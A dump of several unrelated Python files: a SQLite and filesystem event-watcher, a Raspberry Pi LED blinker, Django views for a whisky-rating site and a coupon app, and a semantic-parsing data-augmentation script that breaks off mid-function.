"""Get matching records from db."""
# if file does not exist, do not try to open it. Opening connection
# will create the file, there is no way to prevent this from
# happening until py3.
#
if not os.path.exists(db_path):
_LOGGER.info('Ignore deleted db: %s', db_path)
return (None, None)
# There is rare condition that the db file is deleted HERE. In this
# case connection will be open, but the tables will not be there.
conn = sqlite3.connect(db_path)
# Before Python 3.7 GLOB pattern must not be parametrized to use index.
select_stmt = """
SELECT timestamp, path, data FROM %s
WHERE directory GLOB ? AND name GLOB '%s' AND timestamp >= ?
ORDER BY timestamp
""" % (sow_table, pattern)
# Return open connection, as conn.execute is cursor iterator, not
# materialized list.
try:
return conn, conn.execute(select_stmt, (watch, since,))
except sqlite3.OperationalError as db_err:
# Not sure if the file needs to be deleted at this point. As
# sow_table is a parameter, passing non-existing table can cause
# legit file to be deleted.
_LOGGER.info('Unable to execute: select from %s:%s ..., %s',
db_path, sow_table, str(db_err))
conn.close()
return (None, None)
def _sow(self, watch, pattern, since, handler, impl, sub_id=None):
"""Publish state of the world."""
if since is None:
since = 0
def _publish(item):
when, path, content = item
try:
payload = impl.on_event(str(path), None, content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=W0703
_LOGGER.exception('Error handling sow event: %s, %s, %s, %s',
path, content, when, sub_id)
handler.send_error_msg(str(err), sub_id=sub_id)
db_connections = []
fs_records = self._get_fs_sow(watch, pattern, since)
sow = getattr(impl, 'sow', None)
sow_table = getattr(impl, 'sow_table', 'sow')
try:
records = []
if sow:
dbs = sorted(glob.glob(os.path.join(self.root, sow, '*')))
for db in dbs:
if os.path.basename(db).startswith('.'):
continue
conn, db_cursor = self._db_records(
db, sow_table, watch, pattern, since
)
if db_cursor:
records.append(db_cursor)
# FIXME: Figure out pylint use before assign
#
# pylint: disable=E0601
if conn:
db_connections.append(conn)
records.append(fs_records)
# Merge db and fs records, removing duplicates.
prev_path = None
for item in heapq.merge(*records):
_when, path, _content = item
if path == prev_path:
continue
prev_path = path
_publish(item)
finally:
for conn in db_connections:
if conn:
conn.close()
def _get_fs_sow(self, watch, pattern, since):
"""Get state of the world from filesystem."""
root_len = len(self.root)
fs_glob = os.path.join(self.root, watch.lstrip('/'), pattern)
files = glob.glob(fs_glob)
items = []
for filename in files:
try:
stat = os.stat(filename)
with io.open(filename) as f:
content = f.read()
if stat.st_mtime >= since:
path, when = filename[root_len:], stat.st_mtime
items.append((when, path, content))
except (IOError, OSError) as err:
# Ignore deleted files.
if err.errno != errno.ENOENT:
raise
return sorted(items)
def _gc(self):
"""Remove disconnected websocket handlers."""
for directory in list(six.viewkeys(self.handlers)):
handlers = [
(pattern, handler, impl, sub_id)
for pattern, handler, impl, sub_id in self.handlers[directory]
if handler.active(sub_id=sub_id)
]
_LOGGER.info('Number of active handlers for %s: %s',
directory, len(handlers))
if not handlers:
_LOGGER.info('No active handlers for %s', directory)
self.handlers.pop(directory, None)
if directory not in self.watch_dirs:
# Watch is not permanent, remove dir from watcher.
self.watcher.remove_dir(directory)
else:
self.handlers[directory] = handlers
@utils.exit_on_unhandled
def run(self, once=False):
"""Run event loop."""
last_gc = time.time()
while True:
wait_interval = 10
if once:
wait_interval = 0
if self.watcher.wait_for_events(wait_interval):
self.watcher.process_events()
if (time.time() - last_gc) >= wait_interval:
self._gc()
last_gc = time.time()
if once:
break
@utils.exit_on_unhandled
def run_detached(self):
"""Run event loop in separate thread."""
event_thread = threading.Thread(target=self.run)
event_thread.daemon = True
event_thread.start()
|
#!/usr/bin/env python
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(16,GPIO.OUT)
for x in xrange(2):
GPIO.output(16, GPIO.HIGH)
time.sleep(.15)
GPIO.output(16, GPIO.LOW)
time.sleep(.15)
GPIO.output(16, GPIO.HIGH)
|
import json
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from django.views.generic import TemplateView, DetailView, ListView
from whiskydatabase.models import *
def distillery_list():
distillery_list = Distillery.objects.filter(is_active=True).distinct()
return {'distillery_list': distillery_list}
class HomeView(ListView):
model = WhiskyInfo
template_name = "home.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class WhiskyListView(ListView):
model = WhiskyInfo
template_name = "whisky_list.html"
context_object_name = 'whisky_list'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class DistilleryMapView(ListView):
model = Distillery
template_name = "distillerymap.html"
context_object_name = 'distillery_list'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class BarMapView(ListView):
model = Bar
template_name = "barmap.html"
context_object_name = 'bar_list'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class DistilleryListView(ListView):
model = Distillery
template_name = "home.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
class DistilleryView(DetailView):
template_name = "distillery.html"
model = Distillery
slug_url_kwarg = "distillery_slug"
context_object_name = "distillery_detail"
def dispatch(self, request, *args, **kwargs):
self.object = Distillery.objects.filter(slug=kwargs.get("distillery_slug")).last()
return super(DistilleryView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, *args, **kwargs):
context = super(DistilleryView, self).get_context_data(*args, **kwargs)
context.update(distillery_list())
return context
class WhiskyView(DetailView):
template_name = "whisky_info.html"
model = WhiskyInfo
slug_url_kwarg = "whisky_slug"
context_object_name = "whisky_detail"
def post(self, request, *args, **kwargs):
if request.POST.get('comment') :
content = request.POST.get('comment')
rating = request.POST['myRating']
p_choice = "Public"
if request.POST.get('publish_choice'):
p_choice = "Private"
if rating is not None:
if not rating:
rating = 0
comment = Comment.objects.create(
note = content,
user = self.request.user,
publish_choice = p_choice,
whisky = self.object,
rating = rating
)
comment.save()
curr_rating_total = self.object.num_rating*self.object.rating+float(rating)
self.object.num_rating += 1
self.object.rating = curr_rating_total/self.object.num_rating
self.object.save()
return HttpResponseRedirect('/whisky/{}/#r'.format(self.object.slug))
elif request.POST.get('comment-edit'):
c_id = request.POST.get('comment-id')
comment = Comment.objects.filter(id=c_id).last()
content = request.POST.get('comment-edit')
rating = request.POST['myRating-edit']
p_choice = "Public"
if request.POST.get('publish_choice'):
p_choice = "Private"
if rating is not None:
if not rating:
rating = 0
curr_rating_total = self.object.num_rating*self.object.rating-comment.rating+float(rating)
comment.note = content
comment.rating = rating
comment.publish_choice = p_choice
comment.save()
self.object.rating = curr_rating_total/self.object.num_rating
self.object.save()
return HttpResponseRedirect('/whisky/{}/#r'.format(self.object.slug))
elif request.POST.get('delete_cmt_id'):
delete_cmt_id = request.POST.get('delete_cmt_id')
comment = Comment.objects.filter(id=delete_cmt_id).last()
curr_rating_total = self.object.num_rating*self.object.rating-comment.rating
self.object.num_rating -= 1
if self.object.num_rating == 0:
self.object.rating = 0
else:
self.object.rating = curr_rating_total/self.object.num_rating
self.object.save()
comment.delete()
return HttpResponse(True)
elif request.POST.get('action') and request.POST.get('action') == 'bookmark':
if Wishlist.objects.filter(whisky=self.object, user=request.user).exists():
Wishlist.objects.filter(whisky=self.object, user=request.user).delete()
return HttpResponse(0)
else:
user_wishlist_obj = Wishlist.objects.create(
whisky = self.object,
user = request.user
)
user_wishlist_obj.save()
return HttpResponse(1)
elif request.POST.get('flavor_edit') and request.POST.get('flavor_edit') == 'flavor_edit':
ctrl_id = request.POST.get('ctrl_id')
value = int(request.POST.get('value'))
whisky = self.object
user = self.request.user
p_note = PersonalWhiskyNote.objects.filter(whisky=whisky, user=user).last()
g_note = GeneralWhiskyNote.objects.filter(whisky=self.object).last()
if p_note is None:
p_note = PersonalWhiskyNote.objects.create(
user = user,
whisky = whisky,
)
if g_note is None:
g_note = GeneralWhiskyNote.objects.create(
whisky = whisky,
total_notes_num = 1,
)
g_note.save()
else:
g_note.total_notes_num+=1
g_note.save()
g_note_return = 0
if ctrl_id == '0':
if (p_note.flora is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.flora*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.flora*curr_num-p_note.flora+value)/g_note.total_notes_num
g_note.flora = g_note_return
p_note.flora = value
elif ctrl_id == '1':
if (p_note.fruity is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.fruity*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.fruity*curr_num-p_note.fruity+value)/g_note.total_notes_num
g_note.fruity = g_note_return
p_note.fruity = value
elif ctrl_id == '2':
if (p_note.creamy is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.creamy*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.creamy*curr_num-p_note.creamy+value)/g_note.total_notes_num
g_note.creamy = g_note_return
p_note.creamy = value
elif ctrl_id == '3':
if (p_note.nutty is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.nutty*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.nutty*curr_num-p_note.nutty+value)/g_note.total_notes_num
g_note.nutty = g_note_return
p_note.nutty = value
elif ctrl_id == '4':
if (p_note.malty is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.malty*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.malty*curr_num-p_note.malty+value)/g_note.total_notes_num
g_note.malty = g_note_return
p_note.malty = value
elif ctrl_id == '5':
if (p_note.spicy is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.spicy*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.spicy*curr_num-p_note.spicy+value)/g_note.total_notes_num
g_note.spicy = g_note_return
p_note.spicy = value
elif ctrl_id == '6':
if (p_note.smoky is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.smoky*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.smoky*curr_num-p_note.smoky+value)/g_note.total_notes_num
g_note.smoky = g_note_return
p_note.smoky = value
elif ctrl_id == '7':
if (p_note.peaty is None):
curr_num = g_note.total_notes_num-1
g_note_return = (g_note.peaty*curr_num+value)/g_note.total_notes_num
else:
curr_num = g_note.total_notes_num
g_note_return = (g_note.peaty*curr_num-p_note.peaty+value)/g_note.total_notes_num
g_note.peaty = g_note_return
p_note.peaty = value
p_note.save()
g_note.save()
return HttpResponse(g_note_return)
def dispatch(self, request, *args, **kwargs):
self.object = WhiskyInfo.objects.filter(slug=kwargs.get("whisky_slug")).last()
return super(WhiskyView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, *args, **kwargs):
context = super(WhiskyView, self).get_context_data(*args, **kwargs)
comments = Comment.objects.filter(whisky_id=self.object.id, publish_choice="Public").order_by('created_at')
my_comment = None
if self.request.user == 'AnoymousUser':
my_comment = Comment.objects.filter(whisky_id=self.object.id, user=self.request.user).last()
personal_note_array = [0,0,0,0,0,0,0,0]
general_note_array = [0,0,0,0,0,0,0,0]
personal_note = None
if not self.request.user.is_anonymous:
personal_note = PersonalWhiskyNote.objects.filter(whisky=self.object, user=self.request.user).last()
if personal_note:
personal_note_array = [personal_note.flora, personal_note.fruity, personal_note.creamy, personal_note.nutty, personal_note.malty, personal_note.spicy, personal_note.smoky, personal_note.peaty]
general_note = GeneralWhiskyNote.objects.filter(whisky=self.object).last()
if general_note:
general_note_array = [general_note.flora, general_note.fruity, general_note.creamy, general_note.nutty, general_note.malty, general_note.spicy, general_note.smoky, general_note.peaty]
context.update({
"comments": comments,
"my_comment": my_comment,
"general_note_array": json.dumps(list(general_note_array)),
"personal_note_array": json.dumps(list(personal_note_array)),
'bm_boolean': 1 if Wishlist.objects.filter(whisky=self.object, user_id=self.request.user.id).exists() else 0,
"personal_note": personal_note,
})
context.update(distillery_list())
return context |
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from django.utils import timezone
from .models import Coupon, Claim
from accounts.models import Person
class IndexView(generic.ListView):
template_name = 'coupons/index.html'
context_object_name = 'latest_coupon_list'
def get_queryset(self):
"""Return the last five published coupons."""
return Coupon.objects.filter(
publish_date__lte=timezone.now()
).order_by('-publish_date')[:5]
class DetailView(generic.DetailView):
model = Coupon
template_name = 'coupons/detail.html'
def get_queryset(self):
return Coupon.objects.filter(publish_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Coupon
template_name = 'coupons/results.html'
def claim(request, coupon_id):
coupon = get_object_or_404(Coupon, pk=coupon_id)
if request.user.is_authenticated():
user = Person.objects.get(pk=request.user.id)
if Claim.objects.filter(user=user, coupon=coupon).exists():
# Redisplay the coupon detail form.
return render(request, 'coupons/detail.html', {
'coupon': coupon,
'error_message': "You have already claimed this coupon.",
})
else:
claim = Claim.objects.create(coupon=coupon, user=user)
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('coupons:index'))
else:
return render(request, 'coupons/detail.html', {
'coupon': coupon,
'error_message': "You need to be logged in to claim.",
})
|
import os,sys,inspect
import random
import numpy as np
import copy
import tagger as tg
import tag_utils as tu
from nltk.parse import stanford
from nltk import tree
lo2count = 'count ( <field>:0 )'
lo2avg = 'avg ( <field>:0 )'
lo4max_1 = 'max ( <field>:0 )'
# lo4min_1 = 'min ( <field>:0 )'
lo4max = '<field>:0 where ( <field>:1 equal max ( <field>:1 ) )'
lo4maxb = '<field>:1 where ( <field>:0 equal max ( <field>:0 ) )'
# lo4min = '<field>:0 where ( <field>:1 equal min ( <field>:1 ) )'
lo5maxcnt = '<field>:0 argmax ( count ( <field>:1 ) )'
# lo5mincnt = '<field>:0 argmin ( count ( <field>:1 ) )'
lo6selecteq = '<field>:0 where ( <field>:1 equal <value>:1 )'
lo6selecteqb = '<field>:1 where ( <field>:0 equal <value>:0 )'
lo6selectneq = '<field>:0 where ( <field>:1 neq <value>:1 )'
lo6selectl = '<field>:0 where ( <field>:1 less <value>:1 )'
lo6selectng = '<field>:0 where ( <field>:1 ng <value>:1 )'
lo7selectcnteq = '<field>:0 where ( count ( <field>:1 ) equal <count> )'
lo7selectcntl = '<field>:0 where ( count ( <field>:1 ) less <count> )'
lo7selectcntng = '<field>:0 where ( count ( <field>:1 ) ng <count> )'
lo7selectcntneq = '<field>:0 where ( count ( <field>:1 ) neq <count> )'
lo8between = '<field>:0 where ( <field>:1 between <value>:1 and <value>:1 )'
lo10select = '<field>:0 where ( ( <field>:1 equal <value>:1 ) and ( <field>:2 equal <value>:2 ) )'
lo10selector = '<field>:0 where ( ( <field>:1 equal <value>:1 ) or ( <field>:1 equal <value>:1 ) )'
lo10selectorb = '<field>:1 where ( ( <field>:0 equal <value>:0 ) or ( <field>:0 equal <value>:0 ) )'
lo10selector1 = '<field>:0 where ( ( <field>:0 equal <value>:0 ) or ( <field>:0 equal <value>:0 ) )'
lo10select102 = '<field>:1 where ( ( <field>:0 equal <value>:0 ) and ( <field>:2 equal <value>:2 ) )'
lo10select201 = '<field>:2 where ( ( <field>:0 equal <value>:0 ) and ( <field>:1 equal <value>:1 ) )'
lo11nestmulti = '<field>:0 where ( <field>:1 equal ( select ( <field>:2 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestmultil = '<field>:0 where ( <field>:1 less ( select ( <field>:2 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestmulting = '<field>:0 where ( <field>:1 ng ( select ( <field>:2 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestmulti021 = '<field>:0 where ( <field>:2 equal ( select ( <field>:2 where ( <field>:1 equal <value>:1 ) ) ) )'
lo11nestmulti012 = '<field>:0 where ( <field>:1 equal ( select ( <field>:1 where ( <field>:2 equal <value>:2 ) ) ) )'
lo11nestfront = '<field>:0 where ( <field>:1 equal ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestfrontl = '<field>:0 where ( <field>:1 less ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestfrontng = '<field>:0 where ( <field>:1 ng ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestfrontneq = '<field>:0 where ( <field>:1 ng ( select ( <field>:1 where ( <field>:0 equal <value>:0 ) ) ) )'
lo11nestneq = '<field>:0 where ( <field>:0 equal ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
lo11nestback = '<field>:1 where ( <field>:0 equal ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
lo11nestbackng = '<field>:1 where ( <field>:0 equal ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
lo11nestbackneq = '<field>:1 where ( <field>:0 neq ( select ( <field>:0 where ( <field>:1 equal <value>:1 ) ) ) )'
def isRepetitive(sequence):
for element in sequence[:-1]:
if element == sequence[-1]:
return True
return False
def generateFieldCombs(field_corr_dicts):
''' If only fields are recombinable'''
list_of_seqs = []
if len(field_corr_dicts) == 1:
# base case:
for key in field_corr_dicts[0].keys():
list_of_seqs.append([key])
else:
# recursive case:
former_seqs = generateFieldCombs(field_corr_dicts[:-1])
for key in field_corr_dicts[-1].keys():
for seq in former_seqs:
newseq = [x for x in seq]
newseq.append(key)
# check new repetitive elements
if not isRepetitive(newseq):
list_of_seqs.append(newseq)
return list_of_seqs
def generateValueCombs(field_corr_dicts, field_combination, qu_value):
''' Both fields and values are recombinable
arguments --- field_combination: the selected field combination, where the value are to be decided
'''
list_of_seqs = []
if len(qu_value) == 1:
# base case:
_, idx = qu_value[0] # check position of values
for value in field_corr_dicts[idx][field_combination[idx]]:
list_of_seqs.append([value])
else:
# recursive case:
former_seqs = generateValueCombs(field_corr_dicts, field_combination, qu_value[:-1])
_, idx = qu_value[-1]
for value in field_corr_dicts[idx][field_combination[idx]]:
for seq in former_seqs:
newseq = [x for x in seq]
newseq.append(value)
# check new repetitive elements
if not isRepetitive(newseq):
list_of_seqs.append(newseq)
return list_of_seqs
def augment(field2word, quTemp, loTemp, field_corr, schema_aug):
''' Data augmentation from a pair of query template and logical template
arguments --- field_corr: a list of value_types e.g. ['string','entity','int','bool','date'], each idx should
correspond to the postion in the templates
schema_aug: (self) PLURALS HERE! several schemas that the template could augment to.
return --- collections of queries, logics, and fields
'''
queryCollect, logicCollect, fieldCollect = [], [], []
# Step 1: preparation
print '* step: 1 *'
print quTemp
query = quTemp.split()
logic = loTemp.split()
qu_field = [] # positions of field in query
qu_value = [] # positions of value in query
lo_field = [] # positions of field in logic
lo_value = [] # positions of value in logic
for i in range(len(query)):
reference = query[i].split(':')
if len(reference) == 1:
continue
print reference
idx = int(reference[1])
if reference[0] == '<field>':
qu_field.append((i, idx))
elif reference[0] == '<value>':
qu_value.append((i, idx))
print qu_field, qu_value
for i in range(len(logic)):
reference = logic[i].split(':')
if len(reference) == 1:
continue
print reference
idx = int(reference[1])
if reference[0] == '<field>':
lo_field.append((i, idx))
elif reference[0] == '<value>':
lo_value.append((i, idx))
print lo_field, lo_value
# Step 2: augment to different schemas
print '* step: 2 *'
for j in range(len(schema_aug)):
# Step 2.1: for each schema, build correspondence list of dictionarys: [{}, {}, {}]
field_corr_dicts = []
# print '=== %d schema ===' %j
schema = schema_aug[j]
# because there could be multiple same-type fields in one sentences, we go over field_corr
for k in range(len(field_corr)):
field_corr_dict = dict()
for i in range(len(schema)):
field = schema[i]
#print field
value_type = field2word[schema[i]]['value_type']
if value_type == field_corr[k]:
if value_type == 'entity':
#field_corr_dict[field] = config.field2word[schema[i]]['value_range']
num_sample = 3
if len(field2word[schema[i]]['value_range']) < num_sample:
num_sample = len(field2word[schema[i]]['value_range'])
field_corr_dict[field] = random.sample(field2word[schema[i]]['value_range'], num_sample)
elif value_type == 'string':
#field_corr_dict[field] = config.field2word[schema[i]]['value_range']
num_sample = 3
if len(field2word[schema[i]]['value_range']) < num_sample:
num_sample = len(field2word[schema[i]]['value_range'])
field_corr_dict[field] = random.sample(field2word[schema[i]]['value_range'], num_sample)
elif value_type == 'int':
field_corr_dict[field] = random.sample(range(1, 10), 3)
elif value_type == 'date':
field_corr_dict[field] = [2004, 2007, 2010]
elif value_type == 'time':
field_corr_dict[field] = ['10am', '3pm', '5pm', '1pm']
elif value_type == 'month':
field_corr_dict[field] = ['jan_2nd', 'jan_3rd', 'feb_3rd']
elif value_type == 'bool':
field_corr_dict[field] = [] #'true'
field_corr_dicts.append(field_corr_dict)
# print field_corr_dicts
# now the list of dicts [{str_field1:[], str_field2:[], ...}, {int_field1:[], int_field2:[], ...}]
# Step 2.2: Regenerate sentence by filling into the place
field_combinations = generateFieldCombs(field_corr_dicts)
for field_combination in field_combinations:
print field_combination
newquery = [x for x in query]
newlogic = [x for x in logic]
# regenerate query, lower case or query_word
for (posit, idx) in qu_field:
field_info = field2word[field_combination[idx]]
if len(field_info['query_word']) > 1:
if posit == 0 and 'who' in field_info['query_word']:
pick = 'who'
elif posit == 0 and 'when' in field_info['query_word']:
pick = 'when'
else:
pick = random.choice(field_info['query_word'])
while pick == 'who' or pick == 'when' or pick == 'city':
pick = random.choice(field_info['query_word'])
newquery[posit] = pick
else:
newquery[posit] = field_combination[idx].lower()
# regenerate logic forms
for (posit, idx) in lo_field:
newlogic[posit] = field_combination[idx]
if len(qu_value) > 0:
value_combinations = generateValueCombs(field_corr_dicts, field_combination, qu_value)
for value_combination in value_combinations:
morequery = [x for x in newquery]
morelogic = [x for x in newlogic]
for i in range(len(qu_value)):
morequery[qu_value[i][0]] = str(value_combination[i]).lower()
for i in range(len(qu_value)):
morelogic[lo_value[i][0]] = str(value_combination[i])
queryCollect.append(' '.join(morequery))
if isRepetitive(queryCollect):
del queryCollect[-1]
continue
logicCollect.append(' '.join(morelogic))
fieldCollect.append(' '.join(schema_aug[j]))
# newly added for true
logicCollect[-1] = logicCollect[-1].replace('<value>:1','true')
logicCollect[-1] = logicCollect[-1].replace('<value>:2','true')
continue
queryCollect.append(' '.join(newquery))
# newly added for <count>
fillin = random.sample(['2','3','two','three'], 1)[0]
queryCollect[-1] = queryCollect[-1].replace('<count>',fillin)
if isRepetitive(queryCollect):
del queryCollect[-1]
continue
logicCollect.append(' '.join(newlogic))
fieldCollect.append(' '.join(schema_aug[j]))
logicCollect[-1] = logicCollect[-1].replace('<count>',fillin)
# newly added for true
logicCollect[-1] = logicCollect[-1].replace('<value>:1','true')
logicCollect[-1] = logicCollect[-1].replace('<value>:2','true')
return queryCollect, logicCollect, fieldCollect
def main(parser, field2word, field2word_tag, collect, logic, schema):
''' for certain logic form, we have lines from collect files
return --- queryCollect, logicCollect, fieldCollect
'''
queryCollect, logicCollect, fieldCollect = [], [], []
for query in collect:
# for each line, we parse the query, schema
if query == '':
continue
print '*** New query ***'
print query
#tagging using tag_util's dict
tagged2, field_corr, value_corr, quTemp, _ = \
tg.sentTagging_treeON(parser, field2word_tag, query, ' '.join(schema))
#converting to field_type_corr
field_corr_old = field_corr.split()
field_corr_new = ['' for x in field_corr_old]
for i in range(len(field_corr_old)):
field_type = field2word[field_corr_old[i]]['value_type']
field_corr_new[i] = field_type
schema_aug = [schema]
#augmenting
queryOne, logicOne, fieldOne = augment(field2word, quTemp, logic, field_corr_new, schema_aug)
#extending collections
queryCollect.extend(queryOne)
logicCollect.extend(logicOne)
fieldCollect.extend(fieldOne)
return queryCollect, logicCollect, fieldCollect
# from less to more, equal to neq, argmax to argmin
def expandDatasets(queryCollect, logicCollect, schemaCollect):
newqueryCollect, newlogicCollect, newschemaCollect = [], [], []
for i in range(len(queryCollect)):
query, logic, schema = copy.copy(queryCollect[i]), copy.copy(logicCollect[i]), copy.copy(schemaCollect[i])
## ng, no more
if logic.find(' ng ')!= -1 and query.find('no more')!= -1:
sample = np.random.rand()
if sample >= 0.75:
# stay
if np.random.rand() >= 0.5:
query = query.replace('no more', 'not more')
elif sample >= 0.5 and sample < 0.75:
# to less
logic = logic.replace(' ng ', ' nl ')
if np.random.rand() >= 0.5:
query = query.replace('no more', 'not less')
else:
query = query.replace('no more', 'no less')
elif sample >= 0.25 and sample < 0.5:
# to less
logic = logic.replace(' ng ', ' greater ')
if np.random.rand() >= 0.5:
query = query.replace('no more', 'more')
else:
query = query.replace('no more', 'higher')
else:
# to less
logic = logic.replace(' ng ', ' less ')
if np.random.rand() >= 0.5:
query = query.replace('no more', 'less')
else:
query = query.replace('no more', 'fewer')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
## ng, or less
if logic.find(' ng ')!= -1 and query.find('or less')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('or less', 'or more')
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
## ng, or lower
if logic.find(' ng ')!= -1 and query.find('or lower')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('or lower', 'or higher')
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
## ng, or fewer
if logic.find(' ng ')!= -1 and query.find('or fewer')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('or fewer', 'or more')
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
## ng, or bigger
if logic.find(' ng ')!= -1 and query.find('or bigger')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('or bigger', 'or smaller')
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
## ng, maximum
if logic.find(' ng ')!= -1 and query.find('maximum')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('maximum', 'minimum')
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
# less, less than
if logic.find('less')!= -1 and query.find('less than')!= -1:
sample = np.random.rand()
if sample >= 0.75:
# stay
if np.random.rand() >= 0.5:
query = query.replace('less than', 'fewer than')
elif sample >= 0.5 and sample < 0.75:
# to less
logic = logic.replace('less', 'greater')
if np.random.rand() >= 0.5:
query = query.replace('less than', 'more than')
else:
query = query.replace('less than', 'larger than')
elif sample >= 0.25 and sample < 0.5:
# to less
logic = logic.replace('less', 'nl')
if np.random.rand() >= 0.6:
query = query.replace('less than', 'no less than')
elif np.random.rand() >= 0.3 and np.random.rand() < 0.6:
query = query.replace('less than', 'at least')
else:
query = query.replace('less than', 'equal or more than')
else:
# to less
logic = logic.replace('less', 'ng')
if np.random.rand() >= 0.6:
query = query.replace('less than', 'no more than')
elif np.random.rand() >= 0.3 and np.random.rand() < 0.6:
query = query.replace('less than', 'at most')
else:
query = query.replace('less than', 'equal or less than')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
# less, lower
if logic.find('less')!= -1 and query.find('lower')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('lower', 'higher')
logic = logic.replace('less', 'greater')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
# less, smaller
if logic.find('less')!= -1 and query.find('smaller')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('smaller', 'bigger')
logic = logic.replace('less', 'greater')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
### If in time-domain
# Less
if logic.find('less')!= -1 and query.find('before')!= -1:
if np.random.rand() >= 0.5:
query = query.replace('before', 'after')
logic = logic.replace('less', 'greater')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
if logic.find('less')!= -1 and (query.find('earlier')!= -1 or query.find('shorter')!= -1 \
or query.find('sooner')!= -1):
if np.random.rand() >= 0.5:
oppo = random.choice(['later','greater','longer'])
query = query.replace('earlier', oppo)
query = query.replace('shorter', oppo)
query = query.replace('sooner', oppo)
logic = logic.replace('less', 'greater')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
# Ng
if logic.find(' ng ')!= -1 and (query.find('no later')!= -1 or query.find('no longer')!= -1):
if np.random.rand() >= 0.5:
query = query.replace('no later', 'no earlier')
query = query.replace('no longer', 'no earlier')
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
if logic.find(' ng ')!= -1 and (query.find('or earlier')!= -1 or query.find('or shorter')!= -1 \
or query.find('or before')!= -1):
if np.random.rand() >= 0.5:
oppo = random.choice(['or later','or after','or longer'])
query = query.replace('or earlier', oppo)
query = query.replace('or shorter', oppo)
query = query.replace('or before', oppo)
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
if logic.find(' ng ')!= -1 and (query.find('at most')!= -1 or query.find('at latest')!= -1):
if np.random.rand() >= 0.5:
oppo = random.choice(['at least','at earliest'])
query = query.replace('at most', oppo)
query = query.replace('at latest', oppo)
logic = logic.replace(' ng ', ' nl ')
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
continue
# max, min
if logic.find('max ')!= -1:
newqueryCollect.append(query)
newlogicCollect.append(logic)
newschemaCollect.append(schema)
if query.find('most') != -1:
newqueryCollect.append(query.replace('most', 'least'))
newlogicCollect.append(logic.replace('max ', 'min '))
newschemaCollect.append(schema)
if logic.find('count') != -1:
continue
if np.random.rand() >= 0.5:
# maximum
newqueryCollect.append(query.replace('most', 'maximum'))
newlogicCollect.append(logic)
newschemaCollect.append(schema)
else:
# highest
